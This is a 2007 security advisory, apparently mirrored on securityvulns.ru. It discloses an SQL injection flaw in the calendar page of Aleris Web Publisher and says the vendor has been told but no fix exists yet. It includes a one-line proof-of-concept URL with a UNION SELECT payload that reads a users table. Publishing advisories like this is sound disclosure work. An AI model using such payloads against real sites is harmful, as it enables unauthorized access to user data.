Computer Security

Security Advisory: Aleris Software Systems Web Publisher Calendar SQL injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Novell OpenSUSE SWAMP multiple XSS

  Bosdev Multiple vulnerabilities

  [Vulz]  PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

  Aria-Security.Net [Web based alpha tabbed address book SQL Injection]

From:joseph.giron13_(at)_gmail.com <joseph.giron13_(at)_gmail.com>
Date:24.10.2007
Subject:Aleris Software Systems Web Publisher Calendar SQL injection



http://www.alerisdata.com/articles/home.asp

There exists an SQL injection vulnerability within the calendar section of a Aleris Software Systems web publisher. It seems thats Aleris uses this same calendar with every site they make that utilizes the publisher.

www.example.com/calendar/page.
asp?mode=1%20union%20all%20select%201,2,3,4,5,
6%20FROM%20users--

I reported this to aleris and am awaiting a response. No fix yet.
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server